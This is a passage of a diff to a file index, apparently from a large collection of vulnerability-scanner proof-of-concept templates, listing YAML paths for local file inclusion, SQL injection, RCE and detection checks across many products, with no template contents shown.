-./poc/local_file_inclusion/mpsec-lfi.yaml
./poc/local_file_inclusion/mthemeunus-lfi-8970.yaml
./poc/local_file_inclusion/mthemeunus-lfi-8971.yaml
./poc/local_file_inclusion/mthemeunus-lfi.yaml
@@ -49746,30 +49718,28 @@
./poc/local_file_inclusion/oliver-library-lfi-9241.yaml
./poc/local_file_inclusion/omnia-mpx-lfi.yaml
./poc/local_file_inclusion/opencti-lfi-9267.yaml
-./poc/local_file_inclusion/opencti-lfi-9268.yaml
./poc/local_file_inclusion/opensis-lfi-1.yaml
./poc/local_file_inclusion/opensis-lfi-2.yaml
./poc/local_file_inclusion/opensis-lfi-9315.yaml
./poc/local_file_inclusion/opensis-lfi-9316.yaml
./poc/local_file_inclusion/opensis-lfi-9317.yaml
-./poc/local_file_inclusion/opensis-lfi.yaml
./poc/local_file_inclusion/oracle-ebs-lfi.yaml
./poc/local_file_inclusion/oracle-fatwire-lfi-9378.yaml
./poc/local_file_inclusion/oracle-fatwire-lfi-9379.yaml
./poc/local_file_inclusion/oracle-fatwire-lfi-9380.yaml
+./poc/local_file_inclusion/orbiteam-bscw-server-lfi-9404.yaml
./poc/local_file_inclusion/orbiteam-bscw-server-lfi.yaml
./poc/local_file_inclusion/orbiteam-bscw-server-unauthenticated-lfi.yaml
./poc/local_file_inclusion/ov3-online-administration-unauthenticated-lfi.yaml
./poc/local_file_inclusion/pacsone-server-6-6-2-lfi.yaml
+./poc/local_file_inclusion/pacsone-server-lfi-9428.yaml
./poc/local_file_inclusion/pacsone-server-lfi-9429.yaml
./poc/local_file_inclusion/pacsone-server-lfi-9430.yaml
-./poc/local_file_inclusion/pacsone-server-lfi.yaml
./poc/local_file_inclusion/phpwiki-lfi-9564.yaml
./poc/local_file_inclusion/phpwiki-lfi-9565.yaml
./poc/local_file_inclusion/phpwiki-lfi-9566.yaml
./poc/local_file_inclusion/phpwiki-lfi-9567.yaml
./poc/local_file_inclusion/phpwiki-lfi-9568.yaml
-./poc/local_file_inclusion/pikpikculfi.yaml
./poc/local_file_inclusion/process-maker-lfi.yaml
./poc/local_file_inclusion/processmaker-lfi-9659.yaml
./poc/local_file_inclusion/processmaker-lfi-9660.yaml
@@ -49778,19 +49748,19 @@
./poc/local_file_inclusion/qihang-media-lfi-9766.yaml
./poc/local_file_inclusion/qihang-media-lfi-9767.yaml
./poc/local_file_inclusion/qihang-media-lfi-9768.yaml
-./poc/local_file_inclusion/qihang-media-lfi-9769.yaml
+./poc/local_file_inclusion/qihang-media-lfi.yaml
./poc/local_file_inclusion/ruijie-networks-lfi-9938.yaml
./poc/local_file_inclusion/ruijie-networks-lfi-9939.yaml
./poc/local_file_inclusion/ruijie-networks-lfi-9940.yaml
./poc/local_file_inclusion/ruijie-networks-lfi-9941.yaml
./poc/local_file_inclusion/ruijie-networks-lfi-9942.yaml
./poc/local_file_inclusion/ruoyi-management-lfi.yaml
+./poc/local_file_inclusion/samsung-wlan-ap-lfi-10000.yaml
./poc/local_file_inclusion/samsung-wlan-ap-lfi-10001.yaml
./poc/local_file_inclusion/samsung-wlan-ap-lfi-10002.yaml
./poc/local_file_inclusion/samsung-wlan-ap-lfi-10003.yaml
./poc/local_file_inclusion/samsung-wlan-ap-lfi-9997.yaml
./poc/local_file_inclusion/samsung-wlan-ap-lfi-9998.yaml
-./poc/local_file_inclusion/samsung-wlan-ap-lfi-9999.yaml
./poc/local_file_inclusion/schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml
./poc/local_file_inclusion/selea-targa-camera-lfi.yaml
./poc/local_file_inclusion/shopxolfi.yaml
@@ -49798,6 +49768,7 @@
./poc/local_file_inclusion/shortcode-lfi-10215.yaml
./poc/local_file_inclusion/shortcode-lfi-10216.yaml
./poc/local_file_inclusion/simple-image-manipulator-lfi-10281.yaml
+./poc/local_file_inclusion/simple-image-manipulator-lfi-10282.yaml
./poc/local_file_inclusion/simple-image-manipulator-lfi-10283.yaml
./poc/local_file_inclusion/simple-image-manipulator-lfi.yaml
./poc/local_file_inclusion/sitecore-lfi.yaml
@@ -49805,12 +49776,14 @@
./poc/local_file_inclusion/sl-studio-lfi-10319.yaml
./poc/local_file_inclusion/sl-studio-lfi-10320.yaml
./poc/local_file_inclusion/sl-studio-lfi-10321.yaml
+./poc/local_file_inclusion/sl-studio-lfi.yaml
./poc/local_file_inclusion/sniplets-lfi-10341.yaml
./poc/local_file_inclusion/sniplets-lfi-10342.yaml
./poc/local_file_inclusion/sniplets-lfi-10343.yaml
./poc/local_file_inclusion/sniplets-lfi.yaml
./poc/local_file_inclusion/sofneta-mecdream-pacs-lfi-10350.yaml
./poc/local_file_inclusion/sofneta-mecdream-pacs-lfi-10351.yaml
+./poc/local_file_inclusion/sofneta-mecdream-pacs-lfi.yaml
./poc/local_file_inclusion/sofneta-mecdream-pacs-server-lfi.yaml
./poc/local_file_inclusion/squirrelmail-lfi-10516.yaml
./poc/local_file_inclusion/squirrelmail-lfi-10517.yaml
@@ -49823,44 +49796,45 @@
./poc/local_file_inclusion/targa-camera-lfi-10655.yaml
./poc/local_file_inclusion/thinkcmf-lfi (copy 1).yaml
./poc/local_file_inclusion/thinkcmf-lfi-1.yaml
+./poc/local_file_inclusion/thinkcmf-lfi-10721.yaml
./poc/local_file_inclusion/thinkcmf-lfi-10722.yaml
-./poc/local_file_inclusion/thinkcmf-lfi-10723.yaml
./poc/local_file_inclusion/thinkcmf-lfi-10724.yaml
./poc/local_file_inclusion/thinkcmf-lfi-2.yaml
./poc/local_file_inclusion/thinkcmf-lfi.yml
./poc/local_file_inclusion/thinkcmflfi.yaml
./poc/local_file_inclusion/thinkphp6-lang-lfi.yaml
./poc/local_file_inclusion/video-synchro-pdf-lfi-11006.yaml
+./poc/local_file_inclusion/video-synchro-pdf-lfi-11007.yaml
./poc/local_file_inclusion/video-synchro-pdf-lfi.yaml
./poc/local_file_inclusion/vmware-vcenter-lfi-1.yaml
./poc/local_file_inclusion/vmware-vcenter-lfi-11046.yaml
-./poc/local_file_inclusion/vmware-vcenter-lfi-11047.yaml
./poc/local_file_inclusion/vmware-vcenter-lfi-11048.yaml
./poc/local_file_inclusion/vmware-vcenter-lfi-2.yaml
./poc/local_file_inclusion/vmware-vcenter-lfi-3.yaml
./poc/local_file_inclusion/vmware-vcenter-lfi-linux-11042.yaml
./poc/local_file_inclusion/vmware-vcenter-lfi-linux-11043.yaml
./poc/local_file_inclusion/vmware-vcenter-lfi-linux-11045.yaml
+./poc/local_file_inclusion/vmware-vcenter-lfi.yaml
./poc/local_file_inclusion/windows-lfi-fuzz.yaml
./poc/local_file_inclusion/wordpress-LFI.yaml
./poc/local_file_inclusion/wordpress-ext-adaptive-images-lfi.yaml
./poc/local_file_inclusion/wordpress-ext-adaptive-images-lfi.yml
-./poc/local_file_inclusion/wordpress-lfi.yaml
+./poc/local_file_inclusion/wordpress-wordfence-lfi-11346.yaml
./poc/local_file_inclusion/wordpress-wordfence-lfi-11347.yaml
./poc/local_file_inclusion/wordpress-wordfence-lfi-11348.yaml
./poc/local_file_inclusion/wordpress-wordfence-lfi-11349.yaml
-./poc/local_file_inclusion/wordpress-wordfence-lfi-11350.yaml
./poc/local_file_inclusion/wordpress-wordfence-lfi-11351.yaml
./poc/local_file_inclusion/wordpress-wordfence-lfi-11352.yaml
./poc/local_file_inclusion/wp-brandfolder-plugin-lfi.yaml
./poc/local_file_inclusion/wp-church-admin-lfi.yaml
./poc/local_file_inclusion/wp-javospot-lfi-11480.yaml
./poc/local_file_inclusion/wp-javospot-lfi-11481.yaml
-./poc/local_file_inclusion/wp-javospot-lfi.yaml
+./poc/local_file_inclusion/wp-javospot-lfi-11482.yaml
./poc/local_file_inclusion/wp-javospot-premium-theme-lfi.yaml
./poc/local_file_inclusion/wp-localize-post-lfi.yaml
./poc/local_file_inclusion/wp-mail-masta-lfi.yaml
./poc/local_file_inclusion/wp-memphis-documents-library-lfi-1.yaml
+./poc/local_file_inclusion/wp-memphis-documents-library-lfi-11495.yaml
./poc/local_file_inclusion/wp-memphis-documents-library-lfi-11496.yaml
./poc/local_file_inclusion/wp-memphis-documents-library-lfi-11497.yaml
./poc/local_file_inclusion/wp-memphis-documents-library-lfi-11498.yaml
@@ -49878,7 +49852,6 @@
./poc/local_file_inclusion/wp-simple-fields-lfi-11566.yaml
./poc/local_file_inclusion/wp-simple-fields-lfi-11567.yaml
./poc/local_file_inclusion/wp-simple-fields-lfi-11568.yaml
-./poc/local_file_inclusion/wp-simple-fields-lfi-11569.yaml
./poc/local_file_inclusion/wp-simple-fields-lfi-11570.yaml
./poc/local_file_inclusion/wp-simple-fields-lfi-11571.yaml
./poc/local_file_inclusion/wp-site-editor-lfi.yaml
@@ -49900,8 +49873,8 @@
./poc/local_file_inclusion/wp-tutor-lfi-11597.yaml
./poc/local_file_inclusion/wp-tutor-lfi-11598.yaml
./poc/local_file_inclusion/wp-tutor-lfi-11599.yaml
-./poc/local_file_inclusion/wp-tutor-lfi-11600.yaml
./poc/local_file_inclusion/wp-tutor-lfi-11601.yaml
+./poc/local_file_inclusion/wp-tutor-lfi.yaml
./poc/local_file_inclusion/wp-vault-lfi(1).yaml
./poc/local_file_inclusion/wp-vault-lfi-11606.yaml
./poc/local_file_inclusion/wp-vault-lfi-11607.yaml
@@ -49914,6 +49887,7 @@
./poc/local_file_inclusion/xerox-efi-lfi-11681.yaml
./poc/local_file_inclusion/xerox-efi-lfi-11682.yaml
./poc/local_file_inclusion/xerox-efi-lfi-11683.yaml
+./poc/local_file_inclusion/xerox-efi-lfi.yaml
./poc/local_file_inclusion/xmlrpcservlet_lfi.yaml
./poc/local_file_inclusion/xxe_lfi.yaml
./poc/local_file_inclusion/yisaitong-downloadfromfile-lfi.yaml
@@ -49921,6 +49895,7 @@
./poc/local_file_inclusion/yishaadmin-lfi-11742.yaml
./poc/local_file_inclusion/yishaadmin-lfi-11743.yaml
./poc/local_file_inclusion/yishaadmin-lfi-11744.yaml
+./poc/local_file_inclusion/yishaadmin-lfi.yaml
./poc/local_file_inclusion/yonyou-nc-printbill-lfi.yaml
./poc/local_file_inclusion/zendrop-dropshipping-and-fulfillment-2fe6949ea942d8a3b7779bc5ccf17f38.yaml
./poc/local_file_inclusion/zendrop-dropshipping-and-fulfillment-d55b65118444e2b38ff7422e4f9db780.yaml
@@ -49932,9 +49907,10 @@
./poc/magento/magento-2-exposed-api-2.yaml
./poc/magento/magento-2-exposed-api-3.yaml
./poc/magento/magento-2-exposed-api-8687.yaml
+./poc/magento/magento-2-exposed-api-8688.yaml
./poc/magento/magento-2-exposed-api-8689.yaml
+./poc/magento/magento-admin-panel-8690.yaml
./poc/magento/magento-admin-panel-8691.yaml
-./poc/magento/magento-admin-panel-8692.yaml
./poc/magento/magento-admin-panel-8693.yaml
./poc/magento/magento-admin-panel-8694.yaml
./poc/magento/magento-admin-panel-8695.yaml
@@ -49942,13 +49918,11 @@
./poc/magento/magento-cacheleak-8696.yaml
./poc/magento/magento-cacheleak-8697.yaml
./poc/magento/magento-cacheleak-8698.yaml
-./poc/magento/magento-cacheleak-8699.yaml
./poc/magento/magento-config-1.yaml
./poc/magento/magento-config-2.yaml
./poc/magento/magento-config-8700.yaml
./poc/magento/magento-config-8701.yaml
./poc/magento/magento-config-8703.yaml
-./poc/magento/magento-config-disclosure.yaml
./poc/magento/magento-config.yaml
./poc/magento/magento-detect-1.yaml
./poc/magento/magento-detect-2.yaml
@@ -49982,11 +49956,11 @@
./poc/microsoft/74cms-show-sqli.yaml
./poc/microsoft/74cms-sqli-1.yaml
./poc/microsoft/74cms-sqli-1.yml
-./poc/microsoft/74cms-sqli-10.yaml
./poc/microsoft/74cms-sqli-2.yaml
./poc/microsoft/74cms-sqli-2.yml
./poc/microsoft/74cms-sqli-8.yaml
./poc/microsoft/74cms-sqli-9.yaml
+./poc/microsoft/74cms-sqli.yaml
./poc/microsoft/74cms-sqli.yml
./poc/microsoft/74cms-v3-Boolean-injection.yaml
./poc/microsoft/74cms-workflow.yaml
@@ -50105,11 +50079,13 @@
./poc/microsoft/aikcms_v2-poster-editphp-time-blind.yaml
./poc/microsoft/aikcms_v2-xss.yaml
./poc/microsoft/aikcms_v2_notice_edit_sqli.yaml
-./poc/microsoft/aims-password-mgmt-client-218.yaml
+./poc/microsoft/aims-password-mgmt-client-219.yaml
./poc/microsoft/aims-password-mgmt-client-220.yaml
+./poc/microsoft/aims-password-mgmt-client-221.yaml
./poc/microsoft/aims-password-mgmt-client.yaml
./poc/microsoft/aims-password-portal-222.yaml
./poc/microsoft/aims-password-portal-223.yaml
+./poc/microsoft/aims-password-portal-225.yaml
./poc/microsoft/aims-password-portal.yaml
./poc/microsoft/alibaba-group-dms.yaml
./poc/microsoft/anecms.yaml
@@ -50167,10 +50143,8 @@
./poc/microsoft/beescms_v4-login-sqli.yaml
./poc/microsoft/bems-api-lfi-707.yaml
./poc/microsoft/bems-api-lfi-708.yaml
-./poc/microsoft/bems-api-lfi-709.yaml
./poc/microsoft/bems-api-lfi-710.yaml
./poc/microsoft/bems-api-lfi-711.yaml
-./poc/microsoft/bems-api-lfi-712.yaml
./poc/microsoft/bentley-systems-projectwise.yaml
./poc/microsoft/bio-lims.yaml
./poc/microsoft/block-styler-for-gravity-forms-322a86f28cc5049106653fa64c408640.yaml
@@ -50181,7 +50155,7 @@
./poc/microsoft/bolt-cms-detect-760.yaml
./poc/microsoft/bolt-cms-detect.yaml
./poc/microsoft/bolt-cms-panel-761.yaml
-./poc/microsoft/bolt-cms-panel-762.yaml
+./poc/microsoft/bolt-cms-panel-763.yaml
./poc/microsoft/bolt-cms-panel.yaml
./poc/microsoft/booking-sms-6e9ad46ba7b82908596d92a906a7c328.yaml
./poc/microsoft/booking-sms-d025c95ce85de2f4cfa3bfa54af8279c.yaml
@@ -50272,8 +50246,8 @@
./poc/microsoft/caldera-forms-pro-plugin.yaml
./poc/microsoft/caldera-forms-pro.yaml
./poc/microsoft/caldera-forms.yaml
+./poc/microsoft/call-break-cms-838.yaml
./poc/microsoft/call-break-cms-839.yaml
-./poc/microsoft/call-break-cms-840.yaml
./poc/microsoft/call-break-cms.yaml
./poc/microsoft/cforms-864aa2a30cb2aac523a91326f7cc90dc.yaml
./poc/microsoft/cforms-c00364338071c029d11801e6d6d843db.yaml
@@ -50298,15 +50272,15 @@
./poc/microsoft/chamilo-lms-sqli-1.yaml
./poc/microsoft/chamilo-lms-sqli-2.yaml
./poc/microsoft/chamilo-lms-sqli-891.yaml
-./poc/microsoft/chamilo-lms-sqli-892.yaml
+./poc/microsoft/chamilo-lms-sqli.yaml
./poc/microsoft/chamilo-lms-xss-893.yaml
./poc/microsoft/chamilo-lms-xss-894.yaml
./poc/microsoft/chamilo-lms-xss.yaml
./poc/microsoft/chanzhicms.yaml
./poc/microsoft/chronoforms-3c97c9a74c23d051ec22745b993978f5.yaml
./poc/microsoft/chronoforms.yaml
+./poc/microsoft/cisco-systems-login-973.yaml
./poc/microsoft/cisco-systems-login-974.yaml
-./poc/microsoft/cisco-systems-login-975.yaml
./poc/microsoft/cisco-systems-login.yaml
./poc/microsoft/cluevo-lms-6a1d6ebcef69edeed5f796acb8a5f731.yaml
./poc/microsoft/cluevo-lms-78892043fdf34c1dee70d29718c1a4c1.yaml
@@ -50389,7 +50363,6 @@
./poc/microsoft/couchcms-cve-2018-7662.yml
./poc/microsoft/craft-cms-detect-1246.yaml
./poc/microsoft/craft-cms-detect-1247.yaml
-./poc/microsoft/craft-cms-detect.yaml
./poc/microsoft/craftcms-admin-panel.yaml
./poc/microsoft/craftcms-seomatic-cve-2020-9757-rce.yml
./poc/microsoft/craftercms-detect.yaml
@@ -50446,17 +50419,18 @@
./poc/microsoft/decon-wp-sms-17d0e92e2b742bf4ba974f8caec96975.yaml
./poc/microsoft/decon-wp-sms.yaml
./poc/microsoft/dede-cms-radminpass-disclosure.yaml
-./poc/microsoft/dedecms-carbuyaction-fileinclude-6792.yaml
./poc/microsoft/dedecms-carbuyaction-fileinclude-6793.yaml
+./poc/microsoft/dedecms-carbuyaction-fileinclude-6794.yaml
+./poc/microsoft/dedecms-carbuyaction-fileinclude.yaml
./poc/microsoft/dedecms-carbuyaction-fileinclude.yml
./poc/microsoft/dedecms-cve-2018-6910.yml
./poc/microsoft/dedecms-cve-2018-7700-rce.yml
./poc/microsoft/dedecms-guestbook-sqli.yaml
./poc/microsoft/dedecms-guestbook-sqli.yml
+./poc/microsoft/dedecms-membergroup-sqli-6796.yaml
./poc/microsoft/dedecms-membergroup-sqli-6797.yaml
./poc/microsoft/dedecms-membergroup-sqli-6798.yaml
./poc/microsoft/dedecms-membergroup-sqli-6799.yaml
-./poc/microsoft/dedecms-membergroup-sqli.yaml
./poc/microsoft/dedecms-membergroup-sqli.yml
./poc/microsoft/dedecms-openredirect-6800.yaml
./poc/microsoft/dedecms-openredirect-6801.yaml
@@ -50484,12 +50458,11 @@
./poc/microsoft/dnatools-dnalims.yaml
./poc/microsoft/doccms.yaml
./poc/microsoft/docebolms.yaml
-./poc/microsoft/dotcms-admin-panel-7085.yaml
./poc/microsoft/dotcms-admin-panel-7086.yaml
+./poc/microsoft/dotcms-admin-panel-7087.yaml
./poc/microsoft/dotcms-admin-panel.yaml
./poc/microsoft/dotcms-version-detect.yaml
./poc/microsoft/dotnetcms-sqli-7089.yaml
-./poc/microsoft/dotnetcms-sqli.yaml
./poc/microsoft/dotnetcms-sqli.yml
./poc/microsoft/drupal_module-comscore_direct-cross-site-scripting.yaml
./poc/microsoft/drupal_module-config_perms-access-bypass.yaml
@@ -50498,7 +50471,9 @@
./poc/microsoft/drupal_module-spamspan-cross-site-scripting.yaml
./poc/microsoft/duomicms-sql-injection-7122.yaml
./poc/microsoft/duomicms-sql-injection-7123.yaml
+./poc/microsoft/duomicms-sql-injection-7124.yaml
./poc/microsoft/duomicms-sql-injection-7125.yaml
+./poc/microsoft/duomicms-sql-injection.yaml
./poc/microsoft/duomicms-sqli.yaml
./poc/microsoft/duomicms-sqli.yml
./poc/microsoft/duomicms-workflow.yaml
@@ -50528,10 +50503,8 @@
./poc/microsoft/emails-blacklist-everest-forms-6477bf18cad6c823db485408d49b337b.yaml
./poc/microsoft/emails-blacklist-everest-forms-ee9870d5bef0545dced6af21473d9057.yaml
./poc/microsoft/emails-blacklist-everest-forms.yaml
+./poc/microsoft/empirecms-xss-7218.yaml
./poc/microsoft/empirecms-xss-7219.yaml
-./poc/microsoft/empirecms-xss-7220.yaml
-./poc/microsoft/empirecms-xss.yaml
-./poc/microsoft/ems-login-panel-7223.yaml
./poc/microsoft/ems-login-panel-7224.yaml
./poc/microsoft/ems-login-panel-7225.yaml
./poc/microsoft/ems-login-panel.yaml
@@ -50555,7 +50528,6 @@
./poc/microsoft/feifeicms-lfr-7463.yaml
./poc/microsoft/feifeicms-lfr-7464.yaml
./poc/microsoft/feifeicms-lfr-7465.yaml
-./poc/microsoft/feifeicms-lfr.yaml
./poc/microsoft/feifeicms-lfr.yml
./poc/microsoft/feifeicms-workflow.yaml
./poc/microsoft/feifeicms.yaml
@@ -50674,7 +50646,6 @@
./poc/microsoft/grav-cms-detect-7841.yaml
./poc/microsoft/grav-cms-detect-7842.yaml
./poc/microsoft/grav-cms-detect-7845.yaml
-./poc/microsoft/grav-cms-detect.yaml
./poc/microsoft/gravcms.yaml
./poc/microsoft/gravity-forms-dps-pxpay-dc6fdd47b30188fa018518ba346c5e82.yaml
./poc/microsoft/gravity-forms-dps-pxpay.yaml
@@ -50776,6 +50747,7 @@
./poc/microsoft/integration-for-szamlazz-hu-gravity-forms-24a382814c11d242eafc70c9603f2da8.yaml
./poc/microsoft/integration-for-szamlazz-hu-gravity-forms.yaml
./poc/microsoft/ipec-ipms.yaml
+./poc/microsoft/isams-panel.yaml
./poc/microsoft/jcms-panel.yaml
./poc/microsoft/jeecms.yaml
./poc/microsoft/jeewms-dynamicDataSourceController-rce.yaml
@@ -50785,7 +50757,6 @@
./poc/microsoft/jeewms-lfi-8253.yaml
./poc/microsoft/jeewms-lfi-8254.yaml
./poc/microsoft/jeewms-lfi-8255.yaml
-./poc/microsoft/jeewms-lfi.yaml
./poc/microsoft/jeewms-privilege-bypass.yaml
./poc/microsoft/jeewms-showordownbyurl-fileread.yaml
./poc/microsoft/jeewms-showordownbyurl-fileread.yml
@@ -50818,7 +50789,6 @@
./poc/microsoft/kevinlab-bems-backdoor-8454.yaml
./poc/microsoft/kevinlab-bems-backdoor-8455.yaml
./poc/microsoft/kevinlab-bems-backdoor-8456.yaml
-./poc/microsoft/kevinlab-bems-sqli-8457.yaml
./poc/microsoft/kevinlab-bems-sqli-8458.yaml
./poc/microsoft/kevinlab-bems-sqli-8459.yaml
./poc/microsoft/kevinlab-bems-sqli-8460.yaml
@@ -50826,7 +50796,6 @@
./poc/microsoft/kevinlab-hems-backdoor-8464.yaml
./poc/microsoft/kevinlab-hems-backdoor-8465.yaml
./poc/microsoft/kevinlab-hems-backdoor-8466.yaml
-./poc/microsoft/kevinlab-hems-backdoor-8467.yaml
./poc/microsoft/kiwitcms-json-rpc.yaml
./poc/microsoft/kiwitcms-login-8496.yaml
./poc/microsoft/kiwitcms-login.yaml
@@ -50862,8 +50831,8 @@
./poc/microsoft/lotus-core-cms-lfi.yaml
./poc/microsoft/lotuscms-rce-1.yaml
./poc/microsoft/lotuscms-rce-2.yaml
-./poc/microsoft/lotuscms-rce-8650.yaml
./poc/microsoft/lotuscms-rce-8651.yaml
+./poc/microsoft/lotuscms-rce-8652.yaml
./poc/microsoft/lotuscms-rce-8653.yaml
./poc/microsoft/lws-sms-c00e7e76d8a521ccca85015413c6ff0e.yaml
./poc/microsoft/lws-sms-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -50920,7 +50889,6 @@
./poc/microsoft/menu-items-visibility-control-c141390b43c3b91c671992707f60ed21.yaml
./poc/microsoft/menu-items-visibility-control.yaml
./poc/microsoft/metatag-cms-8832.yaml
-./poc/microsoft/metatag-cms-8833.yaml
./poc/microsoft/microsoft-advertising-universal-event-tracking-uet-f6e4d845703be6cb9b81a808ad73176e.yaml
./poc/microsoft/microsoft-advertising-universal-event-tracking-uet.yaml
./poc/microsoft/microsoft-azure-error.yaml
@@ -50936,8 +50904,10 @@
./poc/microsoft/microsoft-exchange-panel-8850.yaml
./poc/microsoft/microsoft-exchange-panel.yaml
./poc/microsoft/microsoft-exchange-server-detect-8852.yaml
+./poc/microsoft/microsoft-exchange-server-detect-8853.yaml
+./poc/microsoft/microsoft-exchange-server-detect-8854.yaml
./poc/microsoft/microsoft-exchange-server-detect.yaml
-./poc/microsoft/microsoft-exchange-workflow-8855.yaml
+./poc/microsoft/microsoft-exchange-workflow.yaml
./poc/microsoft/microsoft-exchange.yaml
./poc/microsoft/microsoft-ftp-service-detect.yaml
./poc/microsoft/microsoft-ftp-service.yaml
@@ -50961,7 +50931,7 @@
./poc/microsoft/mollie-forms-f0db812e51ae6400a634ecab5f82571a.yaml
./poc/microsoft/mollie-forms.yaml
./poc/microsoft/monstracms-detect.yaml
-./poc/microsoft/ms-adcs-detect-8960.yaml
+./poc/microsoft/ms-adcs-detect-8961.yaml
./poc/microsoft/ms-adcs-detect.yaml
./poc/microsoft/ms-exchange-server-reflected-xss-8962.yaml
./poc/microsoft/ms-exchange-server-reflected-xss-8963.yaml
@@ -50991,6 +50961,7 @@
./poc/microsoft/msmc-redirect-after-comment.yaml
./poc/microsoft/msmq-detect.yaml
./poc/microsoft/msmtp-config-8966.yaml
+./poc/microsoft/msmtp-config-8967.yaml
./poc/microsoft/mspcontrol-login.yaml
./poc/microsoft/mssql-default-logins.yaml
./poc/microsoft/mssql-detect.yaml
@@ -51031,17 +51002,15 @@
./poc/microsoft/myfactory-fms-xss.yaml
./poc/microsoft/myucms-lfr-8983.yaml
./poc/microsoft/myucms-lfr-8984.yaml
-./poc/microsoft/myucms-lfr-8985.yaml
./poc/microsoft/myucms-lfr-8986.yaml
-./poc/microsoft/myucms-lfr-8987.yaml
./poc/microsoft/myucms-lfr.yml
./poc/microsoft/namaste-lms-119ec46f108a332aca6034c537083044.yaml
./poc/microsoft/namaste-lms-5a9d5217f7143833c2e6879ff9d010b1.yaml
./poc/microsoft/namaste-lms-9482e96ff87b6b144e3214e2145ccbb5.yaml
./poc/microsoft/namaste-lms-f3dd353da7150ac371daba104daa37d4.yaml
./poc/microsoft/namaste-lms.yaml
-./poc/microsoft/netlify-cms-9039.yaml
./poc/microsoft/netlify-cms-9040.yaml
+./poc/microsoft/netlify-cms-9041.yaml
./poc/microsoft/netlify-cms.yaml
./poc/microsoft/nex-forms-8ae2cf1fb5917fff39746f64c8df93f8.yaml
./poc/microsoft/nex-forms-express-wp-form-builder-03800489aeb5ec718d025ca048ebef5f.yaml
@@ -51157,13 +51126,13 @@
./poc/microsoft/nitc-cms.yaml
./poc/microsoft/normstar-hr.yaml
./poc/microsoft/nucleus-cms.yaml
-./poc/microsoft/octobercms-default-login-9192.yaml
./poc/microsoft/octobercms-default-login-9193.yaml
+./poc/microsoft/octobercms-default-login.yaml
./poc/microsoft/octobercms-detect-1.yaml
./poc/microsoft/octobercms-detect-2.yaml
./poc/microsoft/octobercms-detect-9194.yaml
-./poc/microsoft/octobercms-detect-9195.yaml
./poc/microsoft/octobercms-detect-9196.yaml
+./poc/microsoft/odoo-cms-redirect-9199.yaml
./poc/microsoft/odoo-cms-redirect-9200.yaml
./poc/microsoft/odoo-cms-redirect-9201.yaml
./poc/microsoft/official-mailerlite-sign-up-forms-2cfff66bdd973664a4a41739a9cfd162.yaml
@@ -51190,14 +51159,15 @@
./poc/microsoft/optin-forms.yaml
./poc/microsoft/orchid-vms-panel.yaml
./poc/microsoft/outsystems-servicecenter-panel.yaml
-./poc/microsoft/pandora-fms-console-9451.yaml
./poc/microsoft/pandora-fms-console-9452.yaml
+./poc/microsoft/pandora-fms-console-9453.yaml
./poc/microsoft/pandora-fms-console.yaml
./poc/microsoft/pandora-fms.yaml
./poc/microsoft/pandorafms-cve-2019-20224-rce.yml
./poc/microsoft/paraview-uams.yaml
./poc/microsoft/payment-forms-for-paystack-9e71ae11056f9c8a0f3c1bdcd525390c.yaml
./poc/microsoft/payment-forms-for-paystack.yaml
+./poc/microsoft/pbootcms-database-file-download-9469.yaml
./poc/microsoft/pbootcms-database-file-download.yaml
./poc/microsoft/pbootcms-database-file-download.yml
./poc/microsoft/pbootcms-v3.1.2-rce.yaml
@@ -51235,15 +51205,16 @@
./poc/microsoft/planso-forms.yaml
./poc/microsoft/plone-cms-detect-9605.yaml
./poc/microsoft/plone-cms-detect-9606.yaml
-./poc/microsoft/plone-cms-detect-9607.yaml
+./poc/microsoft/plone-cms-detect-9608.yaml
./poc/microsoft/plone-cms-detect-9609.yaml
-./poc/microsoft/plone-cms-detect.yaml
./poc/microsoft/power-cpms.yaml
./poc/microsoft/power-powerpms.yaml
./poc/microsoft/powercreator-cms-rce-9643.yaml
./poc/microsoft/powercreator-cms-rce-9644.yaml
+./poc/microsoft/powercreator-cms-rce-9645.yaml
./poc/microsoft/powercreator-cms-rce-9646.yaml
./poc/microsoft/powercreator-cms-rce-9647.yaml
+./poc/microsoft/powercreator-cms-rce.yaml
./poc/microsoft/powercreator-cms.yaml
./poc/microsoft/preamsolutions-inspection-and-modification-information-platform.yaml
./poc/microsoft/pro-chat-rooms.yaml
@@ -51251,6 +51222,7 @@
./poc/microsoft/qibocms-file-download.yaml
./poc/microsoft/qibocms-sqli.yaml
./poc/microsoft/qibocms-sqli.yml
+./poc/microsoft/quick-cms-sqli.yaml
./poc/microsoft/quillforms-63ad11895eca4790d2308fe1895cd383.yaml
./poc/microsoft/quillforms-9a105b65f01831a6b723e0cb2ab1f154.yaml
./poc/microsoft/quillforms.yaml
@@ -51260,13 +51232,14 @@
./poc/microsoft/reflected-params.yaml
./poc/microsoft/rhymix-cms-detect-9876.yaml
./poc/microsoft/rhymix-cms-detect-9877.yaml
+./poc/microsoft/rhymix-cms-detect-9878.yaml
./poc/microsoft/rhymix-cms-detect-9879.yaml
./poc/microsoft/rubygems-key.yaml
./poc/microsoft/ruoyi-cms-unauth.yaml
./poc/microsoft/s-cms.yaml
./poc/microsoft/saferoads-vms-login-9970.yaml
-./poc/microsoft/saferoads-vms-login-9971.yaml
./poc/microsoft/saferoads-vms-login-9972.yaml
+./poc/microsoft/saferoads-vms-login-9973.yaml
./poc/microsoft/saferoads-vms-login-9974.yaml
./poc/microsoft/saferoads-vms-login.yaml
./poc/microsoft/samsung-phish.yaml
@@ -51278,12 +51251,12 @@
./poc/microsoft/samsung-wea453e-rce.yml
./poc/microsoft/samsung-wlan-ap-default-credentials-9996.yaml
./poc/microsoft/samsung-wlan-ap-default-credentials.yaml
+./poc/microsoft/samsung-wlan-ap-lfi-10000.yaml
./poc/microsoft/samsung-wlan-ap-lfi-10001.yaml
./poc/microsoft/samsung-wlan-ap-lfi-10002.yaml
./poc/microsoft/samsung-wlan-ap-lfi-10003.yaml
./poc/microsoft/samsung-wlan-ap-lfi-9997.yaml
./poc/microsoft/samsung-wlan-ap-lfi-9998.yaml
-./poc/microsoft/samsung-wlan-ap-lfi-9999.yaml
./poc/microsoft/samsung-wlan-ap-rce-10004.yaml
./poc/microsoft/samsung-wlan-ap-rce-10005.yaml
./poc/microsoft/samsung-wlan-ap-rce-10006.yaml
@@ -51294,12 +51267,13 @@
./poc/microsoft/samsung-wlan-ap-wea453e-rce.yaml
./poc/microsoft/samsung-wlan-ap-wea453e-rce.yml
./poc/microsoft/samsung-wlan-ap-workflow-10011.yaml
+./poc/microsoft/samsung-wlan-ap-xss-10012.yaml
./poc/microsoft/samsung-wlan-ap-xss-10013.yaml
